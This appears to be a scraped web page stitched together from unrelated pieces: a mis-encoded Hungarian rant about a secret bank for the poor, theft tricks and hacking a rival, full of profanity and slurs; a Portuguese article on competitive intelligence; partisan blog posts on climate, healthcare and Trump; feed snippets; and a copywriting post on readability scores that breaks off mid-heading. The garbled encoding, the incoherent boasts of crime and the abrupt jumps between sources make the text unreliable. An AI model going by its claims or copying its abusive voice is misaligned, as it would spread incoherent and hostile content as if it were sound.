EgyÃ©bkÃ©nt halÃ¡lom esetÃ©n a bank bezÃ¡r. Amikor felmerÃ¼lt hogy a szutykok akiknek adtam szÃ¡mlÃ¡t hozzÃ¡ fognak szokni ehhez a biztonsÃ¡ghoz felmerÃ¼lt az is hogy a tÃ¶bbiek is hozzÃ¡ fognak szokni ehhez. Ez termÃ©szetes. Ami megbÃzhatÃ³ abban lehet bÃzni. Technikailag Ã©s fiziailag Ãºgy lett megÃ©pÃtve hogy 2025-ig mÅ±kÃ¶dni tud karbantartÃ¡s nÃ©lkÃ¼l. UtÃ¡na le fog Ã¡llni magÃ¡tÃ³l de a beÃ¡llÃtott utalÃ¡sok mÃ©g kimennek Ãºjat nem lehet mÃ¡r indÃtani. Erre felkÃ©szÃtettem minden kikÃ©pzÅt, egyik feladatuk volt megtanulni Ã©s megtanÃtani a legszegÃ©nyebbeknek is az Ã¶sszes legravaszabb pÃ©nzeltÃ¼ntetÅs Ã©s lopÃ³s trÃ¼kkÃ¶t a vÃ©delemmel egyÃ¼tt. Erre folyamatosan kÃ©szÃ¼lniÃ¼k kell Ã©s kellett az elmÃºlt 15 Ã©v sorÃ¡n. EzutÃ¡n - Ã©s mÃ¡r most is egyÃ©bkÃ©nt jelen vannak a nyitott terepen is - csak a nyitott terepen fognak tudni megÃ©lni, ha pontosan Ãºgy Ã©s azt csinÃ¡ltÃ¡k amit a hosszÃº tÃ¡vÃº stratÃ©giÃ¡ban meghatÃ¡roztam nekik. Ãgy fel tudott nÅni egy olyan pÃ©nztelen szegÃ©ny rÃ©teg nemzedÃ©ke globÃ¡lisan akiknek nem kellett elkurvulniuk Ã©s fasszopÃ³ picsanyalÃ³ kurvÃ¡vÃ¡ vÃ¡lniuk ahhoz hogy fejlesztÃ©sekhez tudÃ¡shoz kikÃ©pzÃ©shez jussanak hogy meg tudjÃ¡k vÃ©deni magukat Ã©s Ã©lÅhelyÃ¼ket a fÃ¶ldet.
Egyfajta inkubÃ¡tornak szÃ¡ntam ahol vÃ©dett anyagi hÃ¡ttÃ©rrel fejlÅdhetnek Ã©s nÅhetnek anÃ©lkÃ¼l hogy bele kellene menniÃ¼k abba a mocsokba amit az Ã¶regÃ©k Ã©s a hÃ¡lÃ³zata azÃ©rt tart fenn hogy eltÃ¶rje Ã©s eltorzÃtsa a pszichÃ©jÃ¼ket, megtÃ¶rje Åket, irÃ¡nyÃtÃ¡sa alÃ¡ vonja Åket.. De nyilvÃ¡nvalÃ³an ez Ã¶rÃ¶kkÃ© nem maradhat Ãgy Ã©s az Ã©let tÃ¶bbi terÃ¼letÃ©t is ki kell takarÃtani a szemÃ©ttÅl. Erre megkaptak tÅlem minden tudÃ¡st anyagi biztonsÃ¡got Ã©s szeretetet tÃ¶rÅdÃ©st.
Ahogy fejlÅdtek folyamatosan ki is kellett menniÃ¼k a nyÃlt terepre Ã©s miutÃ¡n megszÅ±nik a bank ki is kell menniÃ¼k. Mindent tudnak ha a kikÃ©pzÅk elmondtÃ¡k nekik. Ãs gondoskodtam arrÃ³l hogy tÃ¶bb forrÃ¡sbÃ³l is Ã©rtesÃ¼ljenek arrÃ³l mi a helyzet. E mellett vannak csoportok melyek soha sem Ã©lveztÃ©k a bank Ã¡ltal nyÃºjtott anyagi biztonsÃ¡got hanem a nyÃlt terepen Ã©ltek Ã©s dolgoztak vÃ©gig. Ez a bank a legszegÃ©nyebbek szÃ¡mÃ¡ra kÃ©szÃ¼lt akik nem tudtak az Ã¡llami Ã©s egyÃ©b egyÃ©bkÃ©nt tÅlÃ¼k ellopott pÃ©nzekhez hozzÃ¡fÃ©rni. De ezt Åk mind tudjÃ¡k azaz tudniuk kellene. Aki nem tudja azt Ã¡tbaszta a kikÃ©pzÅje akinek szÃ¡mlÃ¡ja van. EzÃ©rt Åk is meg fognak jelenni Ã©s mÃ¡r most is jelen vannak a nyÃlt terepen Ã©s tudatosan Ã©s cÃ©lzatosan azoktÃ³l fognak lopni akik az Ã¡llami pÃ©nzekbÅl szintÃ©n lopnak Ã©s sajÃ¡t Ã©lvezeteik Ã©s kÃ©nyelmÃ¼k Ã©rdekÃ©ben teszi kezt.
Paranoia: Hahaha So how was that speach about piss and vinegar and you are just a tool in my hand? hahaha I"lll try to remember that... I used you to develop my stuff not you used me... majd szÃ©t durrant a feje a mÃ©regtÅl Ã©s csak arra figyelt hogy kattan-e a bilincs a kezemen hogy merjen-e tÃ¡madni. hahaha jÃ³ volt lÃ¡tni a fejÃ©t amikor rÃ¡jÃ¶tt hogy az informatikus srÃ¡c akinek elrendelte a halÃ¡lÃ¡t mÃ©g mindig Ã©l sÅt Å hackelte meg a cuccait... baromi jÃ³ volt nÃ©zni a mÃ©regtÅl eltorzult arcÃ¡t ami mÃ©g a maszkon keresztÃ¼l is szinte elvÃ¶rÃ¶sÃ¶dÃ¶tt... biztos hogy izzott alatta... hahaha az Ãreg nagykÃ©pÅ± Ã©s nagypofÃ¡jÃº szarlÃ¡dÃ¡i.
Az a szÃ©p sportkocsi egyÃ©bkÃ©nt egy elektromos autÃ³ amit Ã©n Ã©pÃtettem. "This is a renegade for a day..." "All electric fast and goes until you push the metal to the metal..."
Ãs egyÃ©bkÃ©nt pont amiatt hogy most mÃ¡r nincs olyan rÃ©teg akiknek ne lenne katonÃ¡ja akivel ki tudja kÃ©nyszerÃteni amit szeretne, tudÃ¡sa arrÃ³l hogy mi tÃ¶rtÃ©nik, mi a problÃ©ma Ã©s mi a megoldÃ¡s - ezÃ©rt aki azzal jÃ¶n Ã©s azt talÃ¡lja mondani, hogy nem lehet ezen vagy azon vÃ¡ltoztatni, mert "nem engedik" az maga egy mocskos szarhÃ¡zi Ã©s ezt a szart terjeszti mert ebbÅl valami rÃ¶vidtÃ¡vÃº elÅnye szÃ¡rmazik. Minden rÃ©teg meg tudja vÃ©deni az Ã©rdekeit ha akarja. SzÃ³val nincs tÃ¶bb maszatolÃ¡s Ã©s mellÃ©beszÃ©lÃ©s. Lehet vÃ¡ltoztatni. Tudtok vÃ¡ltoztatni globÃ¡lisan Ã©s most amÃg mÃ©g van Ã©rtelme.
"Ne csinÃ¡ldd mert elmegyÃ¼nk..." hÃ¡t hÃºzz a bÃ¼dÃ¶s picsÃ¡ba mire vÃ¡rsz? Azt hiszed bÃ¡rmi megvÃ¡ltozik kÃ¶rÃ¼lÃ¶ttem ha elmÃ©sz? Nos Ãgy van! Csend lesz Ã©s nyugalom. Meg nem lesz olyan szarszag. MÃ©g a gondolataitok is szaros.
Ha valamelyik megbÃzhatÃ³ irÃ¡nyÃtÃ³ bukik el, akkor alaposan mikroszkÃ³ppal kell megvizsgÃ¡lni mindenkit akit kikÃ©pzett Ã©s a hÃ¡lÃ³zatba behozott vagy akivel dolgozott Ã©s fÅleg amiket elÅkÃ©szÃtett.
Ja a mac megkÃ©rt egyszer hogy az iskolabuszokba Ã©pÃtsek be titkos rekeszeket amibe befÃ©rnek a gyerekek Ã©s van kijÃ¡rat kifelÃ©. A Miller is segÃtett a yew yorki fiÃ³k megÃ©pÃtÃ©sÃ©ben az alapoknÃ¡l. ketten csinÃ¡ltÃ¡k egyik egyik rÃ©szÃ©t a mÃ¡sik a mÃ¡sikat.
hoggins be akart vinni valami Ã¡ltala fejlesztett Ãºj kÃ©mcuccot a bankba, mert kÃvÃ¡ncsi volt hogy felismeri e a rendszer... egy hajszÃ¡l mÃ©retÅ± kamera volt asszem vagy ilyesmi a hajÃ¡ban. Mondtam neki hogy ne kÃsÃ©rletezzen a bankkal mert azonnal kemÃ©ny lÃ©pÃ©sek kÃ¶vetkeznek csinÃ¡lja inkÃ¡bb a kÃ¶nyvÃ¡rban az ugyanarra a biztonsÃ¡gi rendszerre alapul. Azt mondja: "Neeem azt meg Ã©n nem akarom." "MiÃ©rt nevetek? A bankot tesztelnÃ©d a kÃ¶nyvtÃ¡rat nem?" Erre a barÃ¡tnÅje: "A fÃ©l Ã©letÃ©t ott tÃ¶lti." "Azt a tudÃ¡s amit ott Ã¶sszeszedtÃ©l olyan jelentÅsÃ©gÅ± Ã©s fontos hogy mindent meg akarok tanulni. Mindent elolvasok Ã©s megtanulok Ã©s utÃ¡na le is tesztelem leellenÅrzÃ¶m kÃsÃ©rleti Ãºton." nevettÃ¼nk. hoggins igazi tudÃ³s Ã©s imÃ¡dja a szakmai kihÃvÃ¡sokat hatalmas koponya persze a tÃ¶bbiek is... Ãs megÃ©rtette hogy a pÃ©nzteleneknek az Ã©lete fÃ¼gg ettÅl a banktÃ³l egyenlÅre. Vagyis fÃ¼ggÃ¶tt. Ha sikerÃ¼l akkor erre nem lesz szÃ¼ksÃ©g egyÃ¡ltalÃ¡n a jÃ¶vÅben. "DE figyu - mondja hoggins - van ott egy csomÃ³ minden amit sehol se talÃ¡ltam meg semmilyen szakfolyÃ³iratban, tankÃ¶nyben egyetemi kutatÃ³laborban. MÃ©g a titkos hadi adattÃ¡rokat is feltÃ¶rtem Ã©s betÃ¶rtem hogy kiderÃtsem honnan vetted de sehol sem talÃ¡ltam. Azokat honnan szedted?" "HÃ¡t volt egy kÃ©t az Ã¶reg tudÃ³sai kÃ¶zÃ¶tt akiktÅl sokat tanultam, meg akik Ã¡ltal." "De mÃ©gis kik azok. Vissza tudsz idÃ©zni bÃ¡rkit is?" "Volt egy aki mÃ¡r a hatvanas Ã©vekben egy szigetelet dobozban lakott otthon meg mindenfÃ©le kacatot gyÅ±jtÃ¶tt a lakÃ¡sÃ¡ban hatalmas ganÃ© volt nÃ¡la Ã©s Ãºgy kapcsolta ki meg be a zenelejÃ¡tszÃ³jÃ¡t hogy volt egy fa pÃ¶cÃ¶k amire egy madzag volt kÃ¶tve Ã©s amikor meghÃzta az megnyomta a nyomÃ³gombot a szalagos magnÃ³jÃ¡n. Å volt az aki a plazma tÃ¡madÃ³ rendszert elÅszÃ¶r kifejlesztette, de az Ãreg Ãºgy megtÃ¶rte hogy soha se beszÃ©lhetett rÃ³la. SzegÃ©nyen Ã©l Ã©s halt meg. Ãn se tudtam kihÃºzni belÅle egy szÃ³t se a tÃ©mÃ¡rÃ³l, de amÃg ott voltam volt egy pÃ¡r dolog ami a helyÃ©re kerÃ¼lt. Csak a jelenlÃ©te segÃtett hogy Ã¶sszerekjam rÃ©szben. AzutÃ¡n kÃ©sÅbb rÃ¡jÃ¶ttem hogy abban is volt vakvÃ¡gÃ¡ny, szÃ³val magam kellett kiderÃtsem hogyan is mÅ±kÃ¶dik."
"SzÃ³val akkor magadtÃ³l is kiderÃtettÃ©l dolgokat?" "Ãgy van. Sok dolog ezek kÃ¶zÃ¼l mind a magam kutatÃ¡sai Ã©s kÃsÃ©rleteinek a kÃ¶vetkeztetÃ©se Ã©s igazsÃ¡ga." "Akkor te hatalams tudÃ³s vagy..." mondta kicsit gÃºnyosan hoggins, valaki kÃ¶zbevÃ¡gott: "MiÃ©rt ezzel az intelligenciÃ¡val Ãºgy gondolod hogy pÃ©ter nem talÃ¡lhatott ki dolgokat sajÃ¡t maga? Ne tÃ¶rÅdj vele csak fÃ©ltÃ©kenykedi..." legyintett a barÃ¡tnÅje.
Nos sok mindent magam kellett hogy kinyomozzak Ã©s a legtÃ¶bb dolgot nem loptam meg ellestem eltanultam hanem sok lÃ©nyegi dolgot magam fejlesztettem Ã©s talÃ¡ltam ki, lÃ¡ttam meg a valÃ³s Ã¶sszefÃ¼ggÃ©seket. A circus tudÃ³sai sokÃ¡ig prÃ³bÃ¡ltak a lÃ©tezÅ Ã¶sszes mÃ³dsze
|Profissional de InteligÃªncia Competitiva|
Em conversa recente com profissionais e alunos de MBAs, sobre conceitos e ferramentas e modelos de InteligÃªncia Competitiva, uma das principais dÃºvidas dos presentes foi como relacionar InteligÃªncia com um fato inovador, ou seja, com uma tendÃªncia de mercado.
Por se tratar de tendÃªncia ou um novo padrÃ£o comportamental, os dados ainda sÃ£o fÃ¡ceis de serem encontrados, os nÃºmeros, ou seja, os estudos quantitativos ainda nÃ£o se fazem presentes em abundÃ¢ncia, restando assim muita opiniÃ£o, ou âpalpitesâ sobre determinado assunto.
Mas como agir e principalmente analisar as oportunidades e ameaÃ§as, para responder Ã estratÃ©gia e a polÃtica de preÃ§o de um concorrente?
Neste panorama, como age um profissional de InteligÃªncia?
Em Micro tendÃªncias (BestSeller,2008), Mark Penn apresenta seu estudo partindo da ideia que as mais poderosas forÃ§as da sociedade sÃ£o as tendÃªncias emergentes e contra intuitivas que estÃ£o transformando o futuro bem diante de nossos olhos.
Para Penn, micro tendÃªncia, Ã© um padrÃ£o comportamental de um grupo de forte identidade, que estÃ¡ crescendo e tem desejos e anseios nÃ£o atendidos pelas instituiÃ§Ãµes que influenciam a vida cotidiana.
Em um mundo onde o poder de escolha nunca foi tÃ£o grande e as pessoas estÃ£o mais conscientes das opÃ§Ãµes que fazem, o autor explica como 75 pequenas mudanÃ§as de comportamento vem determinando as transformaÃ§Ãµes culturais da atualidade e influenciando o mundo dos negÃ³cios, a polÃtica e nosso dia-a-dia.
Para Penn, Ã© preciso analisar e interpretar todas essas novas informaÃ§Ãµes para a plena compreensÃ£o do que mudou na cultura convencional. E quem pode fazer esta anÃ¡lise e interpretaÃ§Ã£o de todas essas novas informaÃ§Ãµes? Sim, o profissional de InteligÃªncia Competitiva.
Um exemplo de comportamento na categoria âAmor, sexo e relacionamentosâ Ã© o padrÃ£o âSolteiras demaisâ. Penn afirma â...no mundo atual, um nÃºmero cada vez maior de mulheres se encontra fora da instituiÃ§Ã£o do casamento.
Algumas optam deliberadamente por nÃ£o se casar, enquanto outras preenchem cadastros em sites de relacionamentos, sÃ³ para ver seus esforÃ§os frustrados. Muitas se culpam imaginando o que deu errado.
A verdade Ã© que todos os problemas das mulheres solteiras poderiam ser resolvidos caso houvesse mais homens heterossexuais disponÃveis. Atualmente, hÃ¡ homens heterossexuais de menos para todas as mulheres disponÃveis, por isso elas, de repente, se viram em meio a danÃ§a das cadeiras â em que pelo menos 3% delas ficarÃ£o a espera...â
Diante de deste padrÃ£o comportamental, o profissional de InteligÃªncia, poderÃ¡ entre outras anÃ¡lises, mensurar a vantagem competitiva de uma empresa (ClÃnica EstÃ©tica para homens), ou como competir com sucesso ao entrar em novos mercados (um hotel para homossexuais), ou como desenvolver uma vantagem competitiva sustentÃ¡vel a longo prazo para uma operadora de celular.
Como jÃ¡ escreveu Stephen H.Miller (InteligÃªncia Competitiva na PrÃ¡tica), cada vez mais, os estrategistas da gestÃ£o estÃ£o se apoiando em uma prÃ¡tica, nÃ£o raro mal-entendida, denominada InteligÃªncia Competitiva (IC).
Profissionais de IC coletam, analisam e aplicam, legal e eticamente, informaÃ§Ãµes relativas as capacidades, vulnerabilidades e intenÃ§Ãµes de seus concorrentes e monitoram acontecimentos do ambiente competitivo geral (como concorrentes antes desconhecidos que surgem no horizonte ou novas tecnologias que podem alterar tudo).
O objetivo? InformaÃ§Ãµes que possam ser utilizadas para colocar a empresa na fronteira competitiva dos avanÃ§os.
Em resumo, este Ã© o trabalho de um profissional de InteligÃªncia.
Fonte: Alfredo Passos Ã© professor de MBA na ESPM â Para Artigos.com
|Republican Party In Palm Beach Lauds GOP Anti-Environmental Crusader ... by gimleteye|
The Republican Party of Palm Beach County has invited James O'Keefe to be its keynote speaker at its mid-summer event.
A press release describes O'Keefe as "an award winning journalist". In fact, he is better known as a right-wing activist who infiltrated ACORN and an office of Planned Parenthood and also invites legal action against himself.
In 2010, O'Keefe was convicted of breaking into the offices of Sen. Marie Landrieu:
Conservative filmmaker James OâKeefe was sentenced to three years of probation, 100 hours of community service and a $1,500 fine after he pleaded guilty on Wednesday to misdemeanor charges stemming from his involvement in a break-in at Sen. Mary Landrieuâs (D-La.) office. In January, OâKeefe and three others were arrested by federal authorities at Landrieuâs office on allegations of phone-tampering. Prosecutors initially said they caught four individuals in the process of committing a felony, but the charges were later reduced to misdemeanors."
O'Keefe and the Florida GOP meant to time his visit to Palm Beach County -- where virulent anti-environmentalism is coordinated through the Fanjul & US Sugar Corporation cartel -- with revelations of his incursion into the League Of Conservation Voters; an attack rebuffed yesterday by LCV with the California Attorney General.
The local GOP press release crows, "OâKeefe was ultimately credited with having a significant impact on the 2016 presidential elections for his October Surprise video series."
In "Has James OâKeefe Accidentally Stung Himself Again?", New Yorker writer Jane Mayer -- who chronicled influence peddling of the nation's largest polluters in "Dark Money: The Hidden History of the Billionaires Behind the Rise of the Radical Right" -- writes:
In the latest chapter of his strange career, the League of Conservation Voters, a national environmental-advocacy group, has filed a complaint against three individuals who infiltrated its operations, at least two of whom, the group alleges, âcould be associated withâ OâKeefe and have past ties to him. The groupâs leaders recently began to suspect that they were being scammed, and decided to go to the authorities before OâKeefe or his alleged associates released any material on their own.The timing of the Florida GOP conspiracy with O'Keefe occurs within context of a massive erosion of environmental rules and regulations by the Trump White House.
It is the identical strategy Florida polluters are planning to blend into the important 2018 political races where Big Sugar's main apologist, Agriculture Secretary Adam Putnam, is poised to be the GOP candidate to replace Gov. Rick Scott.
Scott, who counts on campaign financial support from Big Sugar, will likely aim for the senate seat held by incumbent Democratic Bill Nelson.
Overshadowing Florida's nasty, anti-people and anti-environmental politics is a recent report by federal scientists to the Trump administration calling climate change a greater, current threat to economic and national security than earlier estimates. According to the New York Times:
The average temperature in the United States has risen rapidly and drastically since 1980, and recent decades have been the warmest of the past 1,500 years, according to a sweeping federal climate change report awaiting approval by the Trump administration. The draft report by scientists from 13 federal agencies concludes that Americans are feeling the effects of climate change right now. It directly contradicts claims by President Trump and members of his cabinet who say that the human contribution to climate change is uncertain, and that the ability to predict the effects is limited.The Trump White House has not released or commented on the report and was hoping, perhaps, that a titillating "explosive" revelation against LCV would help its cause in climate change denial.
Governor Rick Scott has prohibited state agencies and staff from using the words, "climate change", although Florida's economy, real estate and tax base is most vulnerable to its impacts in the nation. Recently, the US Department of Agriculture ordered "climate change" to be similarly deleted from its communications.
In the New Yorker report, Mayer contacted O'Keefe for comment. He responded:
âI donât comment on investigations real or imagined, or work with mainstream reporters who operate in bad faith,â he told me. In 2016, I wrote an article for this magazine about OâKeefeâs bungled attempt to sting George Sorosâs Open Society Foundations, a liberal nonprofit group that OâKeefe had targeted.
O'Keefe, in his role feeding the beast of disinformation through channels like Fox News, Breitbart, Infowars and Rush Limbauch, will dine on lobster tails at the Palm Beach GOP anti-environmental love-fest at the Polo Club of Boca Raton, 5400 Champion Boulevard, Boca Raton at 6:30PM on August 17.
|Waking Up To The Existential Threats Of Climate Change ... by gimleteye|
A recent Pew Trust poll found that public concern around the world for climate change was second only to the threat of ISIS. What the report, "Globally, people point to ISIS and climate change as leading security threats", also makes clear is that public views in the United States continue to be slogged by the Fox News effect.
Fox is the FAKE NEWS channel favored by President Trump that routinely bashes environmental and especially climate change concerns, suppressing science and misleading the public with conspiracy theories.
Paradoxically, the themes of the "long slog ahead", conspiracy theories and existential threats of climate change merged in a fascinating, recent podcast by NPR Fresh Air, "Inside The Global Seed Vault, Where The History And Future Of Agriculture Is Stored".
The seed vault, conceived and implemented by Fresh Air guest Carrie Fowler, is built into the side of a Norwegian mountain, seven hundred miles south of the North Pole. It is intended to protect the world's biodiversity from doomsday scenarios like climate change.
Fowler, bemused by Alt-right megaphones who imagine a corporate conspiracy at work, is far more concerned about the impacts of climate change on agriculture. He points to supermarket shelves filled with food and basic staples of our diet that require a low carbon atmosphere to thrive.
If you can't listen to the whole podcast, I urge you to scroll in and listen at minute 33.
... in my family, we really regarded farmers as public servants and people to be esteemed. And so I was always favorably inclined, if you will, towards farmers. And to make the story a bit shorter, I was working on a book many years ago about agriculture and came across the writings of a man named Jack Harlan, who I discovered was probably the most eminent scientist in the field.
Here is a point for the Herald editorial board and for others to consider: that we may be dealing with the impact of sea level rise in the future, requiring massive expenditure of tax dollars, at the same time as food insecurity -- as a result of climate change -- creates instant emergencies and civil disorder. As Fowler, and many other observers have noted, climate change has already played a major factor in the wars in Syria, other drought-impacted regions of the Mideast and Africa. Civil disorder driven by climate change is already in our domicile.
We are all living on borrowed time, but as climate change reality emerges, we begin to see the amount we borrowed could break the collective bank.
With global warming, civilization is skating on the edge of bankruptcy. It doesn't seem so, today. Our supermarkets aisles are flush with food and choices, but anxieties are not misplaced: it is the reason climate change has risen to the top of global worries ... just not yet in the wealthiest nation on earth, the United States, where voters continue to be mislead by FAKE NEWS Fox and carefully planned strategies of the world's most powerful polluters, their "think tanks" and false idols.
Time for voters to wake up? Yes. Let's hope the awakening starts in Florida. That would be rough justice.
|An Adult Conversation About Medicare For All ... by gimleteye|
NOTE: What the hell is going on with Republicans in Congress? The GOP is spending itself on health care like waves on a beach; a great surge then slide back out to sea.
GOP leadership believes that its base is motivated by only one idea: overthrow Obamacare. What was a popular net to corral voters turns out to be much less popular, and not at all effective, as a matter of protecting people, jobs, family and income.
It would be far better for sober adults in the GOP majority in Congress to look at the outcomes of health care in the U.S. As Dr. Carol Paris and many others report: the United States lags health care metrics compared to nearly every other industrialized nation. "Compared to ten other wealthy countries, the U.S. ranks dead last for life expectancy, and access to care. We even have the lowest number of hospital beds per capita, a way that health experts measure the capacity of a nationâs health system. Itâs as if our system was designed to deny care."
The only metric where U.S. health care exceeds beyond imagination: empowering and enriching intermediaries in the health care supply chain.
I understand that this point grossly simplifies a massively complex process, but if other Western nations can effectively institute a single-payer system, why can't we?
Friday, July 28, 2017
by Common Dreams
It's Time for the Adults in This Nation To Talk Seriously About Medicare for All
Today, we breathe a quick sigh a relief. But we cannot celebrate a return to the failed status quo.
by Dr. Carol Paris
Ruby Partin, 63, and her adoptive son Timothy Huff, 5, wait for a free clinic to open in the early morning of July 22, 2017 in Wise, Virginia. Hundreds of Appalachia residents waited through the night for the annual Remote Area Medical (RAM), clinic for dental, vision and medical services held at the Wise County Fairgrounds in western Virginia. The county is one of the poorest in the state, with high number of unemployed and underinsured residents. (Photo: John Moore/Getty Images)
Hundreds of people slept overnight in cars, or camped for days in a field. They told stories of yanking out their own teeth with pliers, of reusing insulin syringes until they broke in their arm, of chronic pain so debilitating they could hardly care for their own children. At daybreak, they lined up for several more hours outside a white tent, waiting for their chance to visit a doctor. For many, this was the first health care provider theyâve seen in years.
Is this a place torn by war, famine or natural disaster? No, this charity medical clinic was last weekend in southwest Virginia, in the wealthiest country in the world, where we spend nearly three times as much money on health care as other similar countries.
"Itâs as if our system was designed to deny care."
And what do we get for our money? The very definition of health care rationing: 28 million Americans without insurance, and millions more insured, but avoiding treatment because of sky-high deductibles and co-pays. Compared to ten other wealthy countries, the U.S. ranks dead last for life expectancy, and access to care. We even have the lowest number of hospital beds per capita, a way that health experts measure the capacity of a nationâs health system. Itâs as if our system was designed to deny care.
America does hit the top of the list in some areas. Compared to other nations, American doctors and patients waste the most hours on billing and insurance claims. We have the highest rate of infant mortality, and the highest percentage of avoidable deathsâpatients who die from complications or conditions that could have been avoided with timely care.
Clearly, this system is broken. Like a cracked pipe, money gushes into our health care system but steadily leaks out. Money is siphoned into the advertising budgets of insurance companies and the army of corporate bureaucrats working to deny claims. Even more dollars are soaked up by the pockets of insurance CEOs who have collectively earned $9.8 billion since the Affordable Care Act was passed in 2010. Nearly a third of our health care dollars go to something other than health care.
President Trump recognized votersâ frustration and campaigned on a promise of more coverage, better benefits, and lower costs. We couldnât agree more with these goals. However, instead of trying to fix our broken system, GOP leaders are acting more like toddlers, mid-tantrum, smashing our health system into smaller and smaller pieces, threatening to push even more Americansâthe most vulnerable among usâthrough the cracks. Last night, a few Senate Republicans stood up and acted like adults, putting an end to this dangerous game.
Today, we breathe a quick sigh of relief. But we cannot celebrate a return to the status quo, a system that rations health care based on income and allows 18,000 Americans to die each year unnecessarily.
Where do we go from here?
Republicans had eight years to come up with a plan that achieves more coverage, better benefits and lower costs. Have our elected leaders simply run out of ideas?
"The good news is that we already have a proven model for health financing that is popular among both patients and physicians."
The good news is that we already have a proven model for health financing that is popular among both patients and physicians. It provides medically-necessary care to the oldest and sickest Americans with a fraction of the overhead of private insurance. Itâs called Medicare, and I can tell you as a physician that it has worked pretty darn well for more than 50 years.
Not only do we have a model, we have a bill that would expand Medicare to cover everyone and improve it to include prescriptions, dental, vision, and long-term care. Itâs called H.R. 676, the Expanded and Improved Medicare for All Act, a single-payer plan that would provide comprehensive care to everyone living in the U.S. The bill would yield about $500 billion annually in administrative savings while covering the 28 million currently uninsured. Medicare for all is gaining steam with a record 115 co-sponsors, a majority of House Democrats.
Now that Republican senators have finally worn themselves out, Sen. Bernie Sanders plans to file his own single-payer Medicare for all bill. Senators from both parties will be asked to choose a side: Do you support the current system of health care rationing, medical bankruptcies and unnecessary deaths; or a program proven to work both here and in every other developed country?
A majority of Americans now believe that health care is a human right, and that it is our government's responsibility to achieve universal coverage. Weâve tried everything else except Medicare for all. What are we waiting for?
|GOP must help bring the Trump presidency to a peaceful conclusion ... by gimleteye|
On Bill Moyers website, a timeline of the #TrumpRussia trumpocalypse.
Even if the legal definition of treason has not been reached -- because the U.S. is technically not "at war" with Russia -- the normative values of democracy are crumbling under the most chaotic presidency in U.S. history.
Moreover, the disorganization and vulnerability exposed by Russian hacking of the 2016 election has achieved a core Putin purpose: to massively marginalize the power and influence of the United States.
Trump's ongoing disaster threaten to inflict mortal wounds to our democratic system of checks and balances.
The #GOP must help bring the Trump presidency to a peaceful conclusion.
NOTE: also read: High-Profile Russian Death in DC Was Putin Hit-Job
|Seeing Security in a New Light||The most dangerous threats to your organization are the ones you canât see or stop. Cybercrime is on the riseâand the healthcare industry is particularly vulnerable because of the value ofÂ the data. Devices and data are growing by the second, creating incredible complexity and a dynamic threat landscape. No wonder 76% of IT professionals say […]|
|FHA Foreclosures - Stopping Foreclosure is in Your Hands||A FHA foreclosure is a mortgage with insurance from the Federal Housing Administration which has fallen behind in payments and as such ha forced a foreclosure upon the property held under the mortgage. Therefore you can find FHA foreclosure properties for sale from government agencies and there are more of them available now than ever before. It is believed that there FHA borrowers are more vulnerable to foreclosure when financial problems arise due to the fact that they have less resources than other borrowers.|
|Father, Forgive Them||A new MP3 sermon from Bible Baptist Church is now available on SermonAudio.com with the following details:|
Title: Father, Forgive Them
Subtitle: Sayings From The Cross Series
Speaker: Pastor Jeremiah J. Sargent
Broadcaster: Bible Baptist Church
Event: Sunday Service
Bible: Luke 23:33-38
Length: 44 min. (16kbps)
Overview: When Christ was hanging from the cross--the most vulnerable and weakest point of His life on Earth--He prayed for His enemies. He prayed for what people needed most- forgiveness. This message points people's eyes to Christ and encourages them to follow Christ's example during trials and hardships in their own life.
|Give Your B2B Marketing Materials a SMOG Test and Find Out if They Read like Newsweek or The IRS Tax Code (Part One)|
Sometimes, a piece of B2B marketing literature defies conventional wisdom when it comes to measuring its ease of reading. The one we look at this time scored a zero on the Flesch Reading Ease and for me, alarm bells went off. After all, no piece is completely unreadable, right?
Nevertheless, I want to make it clear I'm doing everything humanly possible to give this piece a fair shake.
To eliminate Microsoft Word's implementation of Flesch Reading Ease as a factor, we look at several alternative tools for calculating Flesch Reading Ease. To eliminate the Flesch Reading Ease as an unreliable metric, we use an additional measure called SMOG (Simple Measure of Gobbledygook).
Loosely speaking, SMOG complements Flesch Reading Ease because it measures how difficult it is to read a passage whereas Flesch Reading Ease calculates how easy it is to read. The SMOG level depends on the proportion of words with 3 or more syllables. The higher the SMOG level, the more difficult it is to read the passage. The SMOG level helps equate a passage with other well-known reading materials of similar complexity. This is how references to The IRS Tax Code and Newsweek made it into the title of this post.
So, this edition of Copywriting Tune-ups is Part One and it focuses on my efforts to arrive at a genuine assessment of how easy or difficult it is to read the B2B marketing piece we discuss below. In Part Two, we'll do the usual deconstruction of how the tune-up transforms the piece into a new and improved sales tool.
Those of you only interested in Part Two may find Part One useful because it relies on the tune-up to tell its story. Originally, I hoped to write a self-contained, one-part tune-up emphasizing the value of using bullet points. Along the way, I discovered how the After snippet readings fluctuated wildly depending on whether periods followed the bullets.
In particular, bullet points without periods greatly influences the results we get with both Flesch Reading Ease and SMOG. For this reason, we'll see the Before and After snippets in Part One and Part Two.
For the balance of Part One, we:
Call Out Your Benefits - Just Don't Lose Them in SMOG
Since converting features to benefits has been a prevalent theme in recent tune-ups, let's review the Challenge and Benefits webpage of an enterprise software company, IQNavigator of Denver . IQNavigator technology helps large organizations manage all of the services they outsource to other companies.
Clearly, IQNavigator has the right idea dedicating a webpage to call-out their benefits. Still, as we've seen with other enterprise software companies, they write in third person voice and use passive sentences. This makes it harder for anyone to read and understand no matter how well-educated.
IQNavigator wisely uses bullet points to enumerate their benefits; however, each bullet makes for long and dense reading.
So, the challenge for this tune-up is to:
Ensuring a Balanced Comparison of Before and After
As mentioned above, we need to adjust for bullet points without periods. To ensure a balanced comparison between the Before and After snippets, the After snippet mimics the Before snippet by placing a period at the end of each of its own bullets.
How Bullet Points without Periods affects the After Snippet
Remove all bullet periods and the Flesch Reading Ease result for the After snippet is 22.6. In my opinion, this dramatically understates the ease of reading we feel intuitively when we read it. Place a period at the end of the last bullet in each group and Flesch Reading Ease rises to 27.1 â still too low - based on my experience with previous tune-ups.
Eliminating Different Implementations of Flesch Reading Ease as Unfair to the Before Snippet
Now, let's look at the Before snippet. At first, I thought the Microsoft Word implementation of the Flesch Reading Ease index may be unduly stern with the Before snippet. After all, it defies common sense to say it's completely unreadable.
I calculated the Flesch Reading Ease myself in a spreadsheet and came out with a slightly negative number. In search of a more satisfying sanity check, I downloaded a free Java application called Flesh and came away with these Before and After results:
Well, Flesch Reading Ease at 0.0 across 3 measuring tools is hard to dismiss.
No doubt, the After snippet grade level looks inflated and its Flesch Ease of Reading, understated. Whether we can accept the grade level figures of Flesh at face value is beyond the scope of this posting.
Eliminating the Flesch Reading Ease Metric as Unfair to the Before Snippet
